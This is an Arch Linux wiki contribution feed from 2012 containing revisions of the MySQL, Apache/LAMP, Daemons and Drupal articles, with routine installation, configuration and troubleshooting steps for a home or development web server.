Currently this package needs a [https://bbs.archlinux.org/viewtopic.php?pid=1229042#p1229042 hack] failing which this package doesn't build sucessfully from sources.<br />
<br />
<br />
[https://aur.archlinux.org/packages/compat-drivers-patched/ compat-drivers-patched] in the AUR should work with >3.7 kernels, or you can compile it from [https://backports.wiki.kernel.org/index.php/Releases kernel.org sources]. You need compat-drivers-3.8-1-u.tar.xz or later. (2 Mar 2013).</div>Wakehttps://wiki.archlinux.org/index.php?title=MariaDB&diff=236333MariaDB2012-11-22T03:03:47Z<p>Wake: /* Reset the root password */ cleanup/systemd</p>
<hr />
<div>[[Category:Daemons and system services]]<br />
[[Category:Database management systems]]<br />
[[cs:MySQL]]<br />
[[de:MySQL]]<br />
[[es:MySQL]]<br />
[[fr:MySQL]]<br />
[[it:MySQL]]<br />
[[sr:MySQL]]<br />
[[tr:MySQL]]<br />
[[zh-CN:MySQL]]<br />
MySQL is a widely spread, multi-threaded, multi-user SQL database. For more information about features, see the [http://www.mysql.com/ official homepage].<br />
== Installation ==<br />
[[pacman|Install]] the {{Pkg|mysql}} package from the [[Official Repositories|official repositories]].<br />
<br />
After installing MySQL, [[Daemons#Starting_manually|start]] the mysqld daemon and run the setup script:<br />
# mysql_secure_installation<br />
<br />
Then [[Daemons#Restarting|restart]] MySQL (mysqld). If you want to start MySQL at boot time, see [[Daemons#Starting_on_boot]].<br />
<br />
== Configuration ==<br />
Once you have started the MySQL server, you probably want to add a root account in order to maintain your MySQL users and databases. This can be done manually or automatically, as mentioned by the output of the above script. Either run the commands to set a password for the root account, or run the secure installation script.<br />
<br />
You now should be able to do further configuration using your favorite interface. For example you can use MySQL's command line tool to log in as root into your MySQL server:<br />
$ mysql -p -u root<br />
<br />
=== Enable remote access ===<br />
The MySQL server is not accessable from the network by default. To enable listing on TCP port 3306 to allow remote connections, comment out the following line in {{ic|/etc/mysql/my.cnf}}:<br />
skip-networking<br />
<br />
=== Enable auto-completion ===<br />
The MySQL client completion feature is disabled by default. To enable it system-wide edit {{ic|/etc/mysql/my.cnf}}, and replace {{ic|no-auto-rehash}} by {{ic|auto-rehash}}. Completion will be enabled next time you run the MySQL client. Please note that enabling this feature can make the client initialization longer.<br />
<br />
== Upgrading ==<br />
You might consider running this command after you have upgraded MySQL and started it:<br />
# mysql_upgrade -u root -p<br />
<br />
== Troubleshooting ==<br />
=== MySQL daemon cannot start ===<br />
If you see something like this:<br />
:: Starting MySQL [FAIL]<br />
and there is no entry in the log files, you might want to check the permissions of files in the directories {{ic|/var/lib/mysql}} and {{ic|/var/lib/mysql/mysql}}. If the owner of files in these directories is not {{ic|mysql:mysql}}, you should do the following:<br />
# chown mysql:mysql /var/lib/mysql -R<br />
If you run into permission problems despite having followed the above, ensure that your {{ic|my.cnf}} is copied to {{ic|/etc/}}:<br />
# cp /etc/mysql/my.cnf /etc/my.cnf<br />
Now try and start the daemon.<br />
<br />
If you get these messages in your {{ic|/var/lib/mysql/hostname.err}}<br />
[ERROR] Can't start server : Bind on unix socket: Permission denied<br />
[ERROR] Do you already have another mysqld server running on socket: /var/run/mysqld/mysqld.sock ?<br />
[ERROR] Aborting<br />
The permissions of {{ic|/var/run/mysqld}} could be the culprit.<br />
# chown mysql:mysql /var/run/mysqld -R<br />
<br />
If you run mysqld and the following error appears:<br />
Fatal error: Can’t open and lock privilege tables: Table ‘mysql.host’ doesn’t exist<br />
Run the following command from the /usr directory to install the default tables:<br />
# cd /usr<br />
# mysql_install_db --user=mysql --ldata=/var/lib/mysql/<br />
<br />
=== Unable to run mysql_upgrade because MySQL cannot start ===<br />
Try run MySQL in safemode:<br />
# mysqld_safe --datadir=/var/lib/mysql/<br />
And then run:<br />
# mysql_upgrade -u root -p<br />
<br />
=== Reset the root password ===<br />
[[Daemons#Starting_manually|Stop]] mysqld<br />
# mysqld_safe --skip-grant-tables &<br />
Connect to the mysql server<br />
# mysql -u root mysql<br />
Change root password:<br />
mysql> UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';<br />
mysql> FLUSH PRIVILEGES;<br />
mysql> exit<br />
[[Daemons#Starting_manually|Start]] mysqld.<br />
<br />
== More Resources ==<br />
* [[LAMP]] - Arch wiki article covering the setup of a LAMP server (Linux Apache MySQL PHP)<br />
* http://www.mysql.com/<br />
* Front-ends: {{AUR|mysql-gui-tools}} {{AUR|mysql-workbench}}</div>Wakehttps://wiki.archlinux.org/index.php?title=MariaDB&diff=236332MariaDB2012-11-22T03:00:26Z<p>Wake: /* Installation */ cleanup/systemd</p>
<hr />
<div>[[Category:Daemons and system services]]<br />
[[Category:Database management systems]]<br />
[[cs:MySQL]]<br />
[[de:MySQL]]<br />
[[es:MySQL]]<br />
[[fr:MySQL]]<br />
[[it:MySQL]]<br />
[[sr:MySQL]]<br />
[[tr:MySQL]]<br />
[[zh-CN:MySQL]]<br />
MySQL is a widely spread, multi-threaded, multi-user SQL database. For more information about features, see the [http://www.mysql.com/ official homepage].<br />
== Installation ==<br />
[[pacman|Install]] the {{Pkg|mysql}} package from the [[Official Repositories|official repositories]].<br />
<br />
After installing MySQL, [[Daemons#Starting_manually|start]] the mysqld daemon and run the setup script:<br />
# mysql_secure_installation<br />
<br />
Then [[Daemons#Restarting|restart]] MySQL (mysqld). If you want to start MySQL at boot time, see [[Daemons#Starting_on_boot]].<br />
<br />
== Configuration ==<br />
Once you have started the MySQL server, you probably want to add a root account in order to maintain your MySQL users and databases. This can be done manually or automatically, as mentioned by the output of the above script. Either run the commands to set a password for the root account, or run the secure installation script.<br />
<br />
You now should be able to do further configuration using your favorite interface. For example you can use MySQL's command line tool to log in as root into your MySQL server:<br />
$ mysql -p -u root<br />
<br />
=== Enable remote access ===<br />
The MySQL server is not accessable from the network by default. To enable listing on TCP port 3306 to allow remote connections, comment out the following line in {{ic|/etc/mysql/my.cnf}}:<br />
skip-networking<br />
<br />
=== Enable auto-completion ===<br />
The MySQL client completion feature is disabled by default. To enable it system-wide edit {{ic|/etc/mysql/my.cnf}}, and replace {{ic|no-auto-rehash}} by {{ic|auto-rehash}}. Completion will be enabled next time you run the MySQL client. Please note that enabling this feature can make the client initialization longer.<br />
<br />
== Upgrading ==<br />
You might consider running this command after you have upgraded MySQL and started it:<br />
# mysql_upgrade -u root -p<br />
<br />
== Troubleshooting ==<br />
=== MySQL daemon cannot start ===<br />
If you see something like this:<br />
:: Starting MySQL [FAIL]<br />
and there is no entry in the log files, you might want to check the permissions of files in the directories {{ic|/var/lib/mysql}} and {{ic|/var/lib/mysql/mysql}}. If the owner of files in these directories is not {{ic|mysql:mysql}}, you should do the following:<br />
# chown mysql:mysql /var/lib/mysql -R<br />
If you run into permission problems despite having followed the above, ensure that your {{ic|my.cnf}} is copied to {{ic|/etc/}}:<br />
# cp /etc/mysql/my.cnf /etc/my.cnf<br />
Now try and start the daemon.<br />
<br />
If you get these messages in your {{ic|/var/lib/mysql/hostname.err}}<br />
[ERROR] Can't start server : Bind on unix socket: Permission denied<br />
[ERROR] Do you already have another mysqld server running on socket: /var/run/mysqld/mysqld.sock ?<br />
[ERROR] Aborting<br />
The permissions of {{ic|/var/run/mysqld}} could be the culprit.<br />
# chown mysql:mysql /var/run/mysqld -R<br />
<br />
If you run mysqld and the following error appears:<br />
Fatal error: Can’t open and lock privilege tables: Table ‘mysql.host’ doesn’t exist<br />
Run the following command from the /usr directory to install the default tables:<br />
# cd /usr<br />
# mysql_install_db --user=mysql --ldata=/var/lib/mysql/<br />
<br />
=== Unable to run mysql_upgrade because MySQL cannot start ===<br />
Try run MySQL in safemode:<br />
# mysqld_safe --datadir=/var/lib/mysql/<br />
And then run:<br />
# mysql_upgrade -u root -p<br />
<br />
=== Reset the root password ===<br />
Stop the mysqld daemon<br />
# systemctl stop mysqld<br />
# mysqld_safe --skip-grant-tables &<br />
Connect to the mysql server<br />
# mysql -u root mysql<br />
Change root password:<br />
mysql> UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';<br />
mysql> FLUSH PRIVILEGES;<br />
mysql> exit<br />
And restart the daemon:<br />
# systemctl restart mysqld<br />
<br />
== More Resources ==<br />
* [[LAMP]] - Arch wiki article covering the setup of a LAMP server (Linux Apache MySQL PHP)<br />
* http://www.mysql.com/<br />
* Front-ends: {{AUR|mysql-gui-tools}} {{AUR|mysql-workbench}}</div>Wakehttps://wiki.archlinux.org/index.php?title=Apache_HTTP_Server&diff=236184Apache HTTP Server2012-11-21T05:32:41Z<p>Wake: /* MySQL */ sp</p>
<hr />
<div>[[Category:Web Server]]<br />
[[cs:LAMP]]<br />
[[de:LAMP Installation]]<br />
[[el:LAMP]]<br />
[[es:LAMP]]<br />
[[fr:Lamp]]<br />
[[it:LAMP]]<br />
[[pl:LAMP]]<br />
[[ru:LAMP]]<br />
[[sr:LAMP]]<br />
[[tr:LAMP]]<br />
[[zh-CN:LAMP]]<br />
[http://en.wikipedia.org/wiki/LAMP_%28software_bundle%29 LAMP] refers to a common combination of software used in many web servers: '''L'''inux, '''A'''pache, '''M'''ySQL, and '''P'''HP. This article describes how to set up the [http://httpd.apache.org Apache HTTP Server] on an Arch Linux system. It also tells you how to optionally install [[PHP]] and [[MySQL]] and integrate these in the Apache server.<br />
<br />
If you only need a web server for development and testing, [[Xampp]] might be a better and easier option.<br />
<br />
==Installation==<br />
# pacman -S apache php php-apache mysql<br />
<br />
This document assumes you will install Apache, PHP and MySQL together. If desired however, you may install Apache, PHP, and MySQL separately and simply refer to the relevant sections below.<br />
<br />
{{Note|New default user and group: Instead of group "nobody", apache now runs as user/group "http" by default. You might want to adjust your httpd.conf according to this change, though you may still run httpd as nobody.}}<br />
<br />
==Configuration==<br />
<br />
===Apache===<br />
For security reasons, as soon as Apache is started by the root user (directly or via startup scripts) it switches to the UID/GID specified in {{ic|/etc/httpd/conf/httpd.conf}}<br />
<br />
* Check for the existence of the http user by looking for ''http'' in the output of the following command:<br />
# grep http /etc/passwd<br />
<br />
* Create the system user http if it does not exist already:<br />
# useradd -d /srv/http -r -s /bin/false -U http<br />
:This creates the http user with home directory {{ic|/srv/http/}}, as a system account (-r), with a bogus shell (-s {{ic|/bin/false}}) and creates a group with the same name (-U).<br />
<br />
* Change {{ic|httpd.conf}} and optionally {{ic|extra/httpd-default.conf}} to your liking. For security reasons, you might want to change '''ServerTokens Full''' to '''ServerTokens Prod''' and '''ServerSignature On''' to '''ServerSignature Off''' in {{ic|extra/httpd-default.conf}}.<br />
<br />
* [[Daemons#Starting manually|Start]] '''httpd''' (the Apache daemon).<br />
<br />
:Apache should now be running. Test by visiting http://localhost/ in a web browser. It should display a simple Apache test page. If you receive a 403 Error, comment out the following line in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* It is also possible to start '''httpd''' automatically [[Daemons#Starting on boot|at boot]].<br />
<br />
====User dirs====<br />
* If you do not want user directories to be available on the web (e.g., {{ic|~/public_html}} on the machine is accessed as http://localhost/~user/ -Note that you can change what this points to in {{ic|/etc/httpd/conf/extra/httpd-userdir.conf}}), comment the following line in {{ic|/etc/httpd/conf/httpd.conf}} since they are activated by default:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* You must make sure that your home directory permissions are set properly so that Apache can get there. Your home directory and {{ic|~/public_html/}} must be executable for others ("rest of the world"). This seems to be enough:<br />
$ chmod o+x ~<br />
$ chmod o+x ~/public_html<br />
<br />
* More secure way to share your home folder with apache is to add '''http user''' in group that your home folder belongs. For example, if your home folder and other sub-folders in your home folder belong to group '''piter''', all you have to do is following:<br />
<br />
$ usermod -aG piter http<br />
<br />
* Of course, you have to give ''read'' and ''execute'' permissions on {{ic|~/}}, {{ic|~/public_html}}, and all other sub-folders in {{ic|~/public_html}} to the group members (group '''piter''' in our case). Do something like following ('''modify commands for your specific case'''):<br />
<br />
$ chmod g+xr-w /home/''yourusername''<br />
$ chmod -R g+xr-w /home/''yourusername''/public_html<br />
<br />
{{Note|This way you do not have to give access to your folder to every single user in order to give access to '''http user'''. Only '''http user''' and other potential users that are in '''piter''' group will have access to your home folder.}}<br />
<br />
and restart '''httpd'''.<br />
<br />
====SSL====<br />
Create self-signed certificate (you can change key size and days of validity)<br />
# cd /etc/httpd/conf<br />
# openssl genrsa -des3 -out server.key 1024<br />
# openssl req -new -key server.key -out server.csr<br />
# cp server.key server.key.org<br />
# openssl rsa -in server.key.org -out server.key<br />
# openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt<br />
In {{ic|/etc/httpd/conf/httpd.conf}} uncomment line<br />
Include conf/extra/httpd-ssl.conf<br />
and restart '''httpd'''.<br />
<br />
====Virtual Hosts====<br />
If you want to have more than one host, make sure you have<br />
{{bc|<br />
# Virtual hosts<br />
Include conf/extra/httpd-vhosts.conf<br />
}}<br />
in {{ic|/etc/httpd/conf/httpd.conf}}.<br />
<br />
In {{ic|/etc/httpd/conf/extra/httpd-vhosts.conf}} set your virtual hosts according the example, e.g.:<br />
{{bc|<br />
NameVirtualHost *:80<br />
<br />
#this first virtualhost enables: http://127.0.0.1, or: http://localhost, <br />
#to still go to /srv/http/*index.html(otherwise it will 404_error).<br />
#the reason for this: once you tell httpd.conf to include extra/httpd-vhosts.conf, <br />
#ALL vhosts are handled in httpd-vhosts.conf(including the default one),<br />
# E.G. the default virtualhost in httpd.conf is not used and must be included here, <br />
#otherwise, only domainname1.dom & domainname2.dom will be accessible<br />
#from your web browser and NOT http://127.0.0.1, or: http://localhost, etc.<br />
#<br />
<br />
<VirtualHost *:80><br />
DocumentRoot "/srv/http"<br />
ServerAdmin root@localhost<br />
ErrorLog "/var/log/httpd/127.0.0.1-error_log"<br />
CustomLog "/var/log/httpd/127.0.0.1-access_log" common<br />
<Directory /srv/http/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname1.dom<br />
DocumentRoot "/home/username/yoursites/domainname1.dom/www"<br />
ServerName domainname1.dom<br />
ServerAlias domainname1.dom<br />
<Directory /home/username/yoursites/domainname1.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname2.dom<br />
DocumentRoot "/home/username/yoursites/domainname2.dom/www"<br />
ServerName domainname2.dom<br />
ServerAlias domainname2.dom<br />
<Directory /home/username/yoursites/domainname2.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
}}<br />
<br />
Add your virtual host names to your {{ic|/etc/hosts}} file (NOT necessary if bind is serving these domains already, but will not hurt):<br />
{{bc|127.0.0.1 domainname1.dom<br />
127.0.0.1 domainname2.dom}}<br />
<br />
and restart '''httpd'''.<br />
<br />
If you setup your virtual hosts to be in your user directory, sometimes it interferes with Apache's 'Userdir' settings. To avoid problems disable 'Userdir' by commenting it out:<br />
{{bc|<br />
# User home directories<br />
#Include conf/extra/httpd-userdir.conf}}<br />
<br />
As said above, ensure that you have the proper permissions:<br />
# chmod 0775 /home/yourusername/<br />
<br />
If you have a huge amount of virtual hosts you easily want to dis- and enable, it's recommended to create one config file per virtualhost and store them all in one folder, eg: {{ic|/etc/httpd/conf/vhosts}}.<br />
<br />
First create the folder:<br />
# mkdir /etc/httpd/conf/vhosts<br />
<br />
Then place the single config files in them:<br />
# nano /etc/httpd/conf/vhosts/domainname1.dom<br />
# nano /etc/httpd/conf/vhosts/domainname2.dom<br />
...<br />
<br />
In the last step, "Include" the single configs in your {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|#Enabled Vhosts:<br />
Include conf/vhosts/domainname1.dom<br />
#Include conf/vhosts/domainname1.dom}}<br />
<br />
You can enable and disable single virtual hosts by commenting them out or uncommenting them.<br />
<br />
====Advanced Options====<br />
These options in {{ic|/etc/httpd/conf/httpd.conf}} might be interesting for you:<br />
<br />
# Listen 80<br />
This is the port Apache will listen to. For Internet-access with router, you have to forward the port.<br />
<br />
If you setup Apache for local development you may want it to be only accessible from your computer. Then change this line to:<br />
# Listen 127.0.0.1:80<br />
<br />
This is the admin's email-address which can be found on e.g. error-pages:<br />
# ServerAdmin sample@sample.com<br />
<br />
This is the directory where you should put your web pages:<br />
# DocumentRoot "/srv/http"<br />
<br />
Change it, if you want to, but do not forget to also change the<br />
<Directory "/srv/http"><br />
to whatever you changed your DocumentRoot to, or you will likely get a 403 error (lack of privileges) when you try to access the new document root. Do not forget to change the Deny from all line, otherwise you will get 403 error too.<br />
<br />
# AllowOverride None<br />
This directive in {{ic|<Directory>}} sections causes apache to completely ignore .htaccess files. If you intend to use rewrite mod or other settings in .htaccess files, you can allow which directives declared in that file can override server configuration. For more info refer to http://httpd.apache.org/docs/current/mod/core.html#allowoverride<br />
<br />
{{Note|If you have issues with your configuration you can have apache check the configuration with:<br />
{{Ic|apachectl configtest}}}}<br />
<br />
===PHP===<br />
* [[pacman|Install]] {{pkg|php-apache}} from the [[Official repositories]].<br />
<br />
* Add these lines in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
:Place this in the {{ic|LoadModule}} list anywhere after {{ic|LoadModule dir_module modules/mod_dir.so}}:<br />
LoadModule php5_module modules/libphp5.so<br />
<br />
:Place this at the end of the {{ic|Include}} list:<br />
Include conf/extra/php5_module.conf<br />
<br />
:Make sure that the following line is uncommented in the {{ic|<IfModule mime_module>}} section:<br />
TypesConfig conf/mime.types<br />
<br />
:Uncomment the following line (optional):<br />
MIMEMagicFile conf/magic<br />
<br />
* Add this line in {{ic|/etc/httpd/conf/mime.types}}:<br />
application/x-httpd-php5 php php5<br />
<br />
{{Note|If you do not see {{ic|libphp5.so}} in the Apache modules directory ({{ic|/etc/httpd/modules}}), you may have forgotten to install {{Pkg|php-apache}}.}}<br />
<br />
* If your {{Ic|DocumentRoot}} is not {{ic|/srv/http}}, add it to {{ic|open_basedir}} in {{ic|/etc/php/php.ini}} as such:<br />
open_basedir=/srv/http/:/home/:/tmp/:/usr/share/pear/:/path/to/documentroot<br />
<br />
* [[systemd#Using units|Restart]] '''httpd'''.<br />
<br />
* Test PHP: Create the file test.php in your Apache DocumentRoot directory (e.g. {{ic|/srv/http/}} or {{ic|~/public_html}}) and inside it put:<br />
<?php phpinfo(); ?><br />
:See if it works: http://localhost/test.php or http://localhost/~myname/test.php<br />
<br />
:If the PHP code is is not executed (you see : <html>...</html>), check that you have added "Includes" to the "Options" line for your root directory in {{ic|/etc/httpd/conf/httpd.conf}}. Moreover, check that {{ic|TypesConfig conf/mime.types}} is uncommented in the <IfModule mime_module> section, you may also try adding the following to the <IfModule mime_module> in httpd.conf:<br />
AddHandler application/x-httpd-php .php<br />
<br />
====Advanced options====<br />
* It is recommended to set your timezone in {{ic|/etc/php/php.ini}} like so: ([http://www.php.net/manual/en/timezones.php list of timezones])<br />
{{bc|1=date.timezone = Europe/Berlin}}<br />
<br />
* If you want to display errors to debug your php code, change {{ic|display_errors}} to {{ic|On}} in {{ic|/etc/php/php.ini}}:<br />
display_errors=On<br />
<br />
* If you want the libGD module, install {{Pkg|php-gd}} and uncomment {{ic|1=extension=gd.so}} in {{ic|/etc/php/php.ini}}:<br />
{{Note|php-gd requires libpng, libjpeg, and freetype2}}<br />
extension=gd.so<br />
{{Note|Pay attention to which extension you uncomment, as this extension is sometimes mentioned in an explanatory comment before the actual line you want to uncomment.}}<br />
<br />
* If you want the mcrypt module, install {{Pkg|php-mcrypt}} and uncomment {{ic|1=extension=mcrypt.so}} in {{ic|/etc/php/php.ini}}:<br />
extension=mcrypt.so<br />
<br />
* Remember to add a file handler for .phtml if you need it in {{ic|/etc/httpd/conf/extra/php5_module.conf}}:<br />
DirectoryIndex index.php index.phtml index.html<br />
<br />
==== Using php5 with apache2-mpm-worker and mod_fcgid ====<br />
Uncomment following in {{ic|/etc/conf.d/apache}}:<br />
HTTPD=/usr/sbin/httpd.worker<br />
Uncomment following in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-mpm.conf<br />
Install mod_fcgid and php-cgi packages:<br />
# pacman -S mod_fcgid php-cgi<br />
Create {{ic|/etc/httpd/conf/extra/php5_fcgid.conf}} with following content:<br />
{{bc|1=<br />
# Required modules: fcgid_module<br />
<br />
<IfModule fcgid_module><br />
AddHandler php-fcgid .php<br />
AddType application/x-httpd-php .php<br />
Action php-fcgid /fcgid-bin/php-fcgid-wrapper<br />
ScriptAlias /fcgid-bin/ /srv/http/fcgid-bin/<br />
SocketPath /var/run/httpd/fcgidsock<br />
SharememPath /var/run/httpd/fcgid_shm<br />
# If you don't allow bigger requests many applications may fail (such as WordPress login)<br />
FcgidMaxRequestLen 536870912<br />
PHP_Fix_Pathinfo_Enable 1<br />
# Path to php.ini – defaults to /etc/phpX/cgi<br />
DefaultInitEnv PHPRC=/etc/php/<br />
# Number of PHP childs that will be launched. Leave undefined to let PHP decide.<br />
#DefaultInitEnv PHP_FCGI_CHILDREN 3<br />
# Maximum requests before a process is stopped and a new one is launched<br />
#DefaultInitEnv PHP_FCGI_MAX_REQUESTS 5000<br />
<Location /fcgid-bin/><br />
SetHandler fcgid-script<br />
Options +ExecCGI<br />
</Location><br />
</IfModule><br />
}}<br />
<br />
Create needed directory and symlink for php wrapper:<br />
# mkdir /srv/http/fcgid-bin<br />
# ln -s /usr/bin/php-cgi /srv/http/fcgid-bin/php-fcgid-wrapper<br />
<br />
Edit {{ic|/etc/httpd/conf/httpd.conf}}:<br />
#LoadModule php5_module modules/libphp5.so<br />
LoadModule fcgid_module modules/mod_fcgid.so<br />
Include conf/extra/php5_fcgid.conf<br />
Make sure {{ic|/etc/php/php.ini}} has the directive enabled:<br />
cgi.fix_pathinfo=1<br />
and [[systemd#Using_units|restart]] '''httpd'''.<br />
<br />
{{Note|1=As of Apache 2.4 (available as [http://aur.archlinux.org/packages.php?ID=60719 AUR package]) you can now use [http://httpd.apache.org/docs/2.4/mod/mod_proxy_fcgi.html mod_proxy_fcgi] (part of the official distribution) with PHP-FPM (and the new event MPM). See [http://wiki.apache.org/httpd/PHP-FPM configuration example]}}<br />
<br />
===MySQL===<br />
* Configure MySQL as described in [[MySQL]].<br />
<br />
* Uncomment at least one of the following lines in {{ic|/etc/php/php.ini}}:<br />
extension=pdo_mysql.so<br />
extension=mysqli.so<br />
extension=mysql.so<br />
<br />
* You can add minor privileged MySQL users for your web scripts. You might also want to edit {{ic|/etc/mysql/my.cnf}} and uncomment the {{ic|skip-networking}} line so the MySQL server is only accessible by the localhost. You have to restart MySQL for changes to take effect. <br />
<br />
* [[Systemd#Using units|Restart]] '''httpd'''.<br />
<br />
{{Tip|You may want to install a tool like [[phpMyAdmin]], [[Adminer]] or {{AUR|mysql-workbench}} to work with your databases.}}<br />
<br />
==See also==<br />
* [[MySQL]] - Article for MySQL<br />
* [[PhpMyAdmin]] - Web frontend for MySQL typically found in LAMP environments<br />
* [[Adminer]] - A full-featured database management tool which is available for MySQL, PostgreSQL, SQLite, MS SQL and Oracle<br />
* [[Xampp]] - Self contained web-server that supports PHP, Perl, and MySQL<br />
* [[mod_perl]] - Apache + Perl<br />
<br />
==External links==<br />
* http://www.apache.org/<br />
* http://www.php.net/<br />
* http://www.mysql.com/<br />
* http://www.akadia.com/services/ssh_test_certificate.html<br />
* http://wiki.apache.org/httpd/CommonMisconfigurations</div>Wakehttps://wiki.archlinux.org/index.php?title=User:Wake&diff=236074User:Wake2012-11-20T04:47:50Z<p>Wake: initial</p>
<hr />
<div>Have been using linux since before v. 1.0. Downloaded a slackware distro over a 2400b modem. Ran on a 4 meg 386 box. No X.<br />
<br />
Used SuSe/Kde until I got fed up with LibreOffice printing bug (fixed) that went undistributed for over a year. Looked at Ubuntu, but went with Arch.<br />
<br />
I'm a retired C/C++/ksh programmer. Arch keeps my mind sharp (I hope).</div>Wakehttps://wiki.archlinux.org/index.php?title=Daemons&diff=236072Daemons2012-11-20T04:17:20Z<p>Wake: A *nix daemon is a process without a terminal connection. systemctl docs really shouldn't be here, but...</p>
<hr />
<div>[[Category:Boot process]]<br />
[[Category:Daemons and system services]]<br />
[[cs:Daemon]]<br />
[[de:Daemons]]<br />
[[es:Daemon]]<br />
[[it:Daemon]]<br />
[[pl:Daemon]]<br />
[[ro:Daemon]]<br />
[[ru:Daemon]]<br />
[[tr:Artsüreç]]<br />
[[zh-CN:Daemon]]<br />
A [[Wikipedia:Daemon (computing)|daemon]] is a program that runs as a "background" process (without a terminal or user interface), commonly waiting for events to occur and offering services. A good example is a web server that waits for a request to deliver a page, or a ssh server waiting for someone trying to log in. While these are full featured applications, there are daemons whose work is not that visible. Daemons are for tasks like writing messages into a log file (e.g. {{ic|syslog}}, {{ic|metalog}}) or keeping your system time accurate (e.g. [[Network Time Protocol daemon|{{ic|ntpd}}]]). For more information see {{ic|man 7 daemon}}.<br />
<br />
{{Note|The word daemon is sometimes used for a class of programs that are started at boot but have no process which remains in memory. They are called daemons simply because they utilize the same startup/shutdown framework (e.g. systemd service files of Type oneshot) used to start traditional daemons. For example, the service files for {{ic|alsa-store}} and {{ic|alsa-restore}} provide persistent configuration support but do not start additional background processes to service requests or respond to events.<br />
<br />
From the user's perspective the distinction is typically not significant unless the user tries to look for the "daemon" in a process list.<br />
}}<br />
<br />
==Managing daemons==<br />
In Arch Linux, daemons are managed by [[systemd]]. The [[Systemd#Basic_systemctl_usage|systemctl]] command is the user interface used to manage them. It reads ''<service>''.service files that contain information about how and when to start the associated daemon. Service files are stored in {{ic|/{etc,usr/lib,run}/systemd/system}}. See [[Systemd#Using_units]] for complete information about using systemctl to manage daemons.<br />
<br />
===Starting on boot===<br />
To add|remove services to be started at boot-time, use {{ic|systemctl enable<nowiki>|</nowiki>disable ''<service_name>''}}<br />
<br />
===Starting manually===<br />
To start or stop services at runtime, use {{ic|systemctl start<nowiki>|</nowiki>stop ''<service_name>''}}.<br />
<br />
===Restarting===<br />
To restart services, use {{ic|systemctl restart ''<service_name>''}}.<br />
<br />
===Status reporting===<br />
To report the current status of a service, use {{ic|systemctl status ''<service_name>''}}.<br />
<br />
==List of daemons==<br />
See [[Daemons List]] for a list of daemons with the name of the service and legacy rc.d script.<br />
<br />
==See also==<br />
* [[Systemd|systemd]]<br />
* Examples for writing [[Systemd/Services]]</div>Wakehttps://wiki.archlinux.org/index.php?title=Drupal&diff=236066Drupal2012-11-20T03:32:40Z<p>Wake: /* Installing GD */ cleanup, systemd.</p>
<hr />
<div>[[it:Drupal]]<br />
[[sr:Drupal]]<br />
[[zh-CN:Drupal]]<br />
[[Category:Web Server]]<br />
<br />
''"Drupal is a free and open source content management system (CMS) and Content Management framework (CMF) written in PHP and distributed under the GNU General Public License."'' - [http://en.wikipedia.org/wiki/Drupal Wikipedia]<br />
<br />
This article describes how to setup Drupal and configure [[Apache]], [[MySQL]] or [[PostgreSQL]], [[PHP]], and [[Postfix]] to work with it. It is assumed that you have some sort of [[LAMP]] (Apache, MySQL, PHP) or LAPP (Apache, PostgreSQL, PHP) server already setup.<br />
<br />
==Installation==<br />
<br />
===Installing Drupal===<br />
<br />
====from Arch repositories====<br />
#Install the {{Pkg|drupal}} package from [[community]] using [[pacman]].<br />
#Edit {{ic|/etc/php/php.ini}}:<br />
#*If PHP version is less than 5.2.0, Find the line with "{{Ic|<nowiki>;extension=json.so</nowiki>}}" and uncomment it by removing the ";" from the beginning of the line if necessary. If no such line is found, add it to the {{Ic|<nowiki>[PHP]</nowiki>}} section of the file. <br />
#*For Drupal 7, enable a PDO extension for your database. For MySQL, the line {{Ic|<nowiki>extension=pdo_mysql.so</nowiki>}} should be uncommented.<br />
#*Find the line beginning "{{Ic|<nowiki>open_basedir =</nowiki>}}". Add the Drupal install directories, {{ic|/usr/share/webapps/drupal/}} and {{ic|/var/lib/drupal/}}. {{ic|/srv/http/}} can be removed if you do not intend to use it.<br />
#Edit {{ic|/etc/httpd/conf/httpd.conf}}:<br />
#*If your webserver is dedicated to drupal,<br />
#**Find the line {{ic|DocumentRoot "/srv/http"}} and change it to the Drupal install directory, ''i.e.'' {{ic|DocumentRoot "/usr/share/webapps/drupal"}}.<br />
#**Find the section that starts with "{{Ic|&lt;Directory "/srv/http"&gt;}}" and change {{ic|/srv/http}} to the Drupal install directory, {{ic|/usr/share/webapps/drupal}}. In the same section, make sure it includes a line "{{Ic|AllowOverride All}}" to enable the clean URL's.<br />
#*If you are using Apache Virtual Hosts, see [[Apache#Virtual_Hosts]].<br />
#Comment out the '{{Ic|deny from all}}' line of the {{ic|/usr/share/webapps/drupal/.htaccess}} file to enable httpd access.<br />
#[[Daemons#Restarting|Restart]] Apache (httpd).<br />
<br />
====manual install====<br />
<br />
#Download the latest package from http://drupal.org and extract it.<br />
#Move the folders to apache's htdocs folder.<br />
#Open a web browser, and navigate to "localhost"<br />
#Follow the on-screen instructions.<br />
<br />
===Installing GD===<br />
You may need the GD library for your Drupal installation.<br />
#Install the {{Pkg|php-gd}} package using [[pacman]].<br />
#Edit {{ic|/etc/php/php.ini}}. Find the line with {{Ic|<nowiki>;extension=gd.so</nowiki>}} and uncomment it by removing the ";". If no such line is found, add it to the {{Ic|<nowiki>[PHP]</nowiki>}} section of the file.<br />
#[[Daemons#Restarting|Restart]] Apache (httpd).<br />
<br />
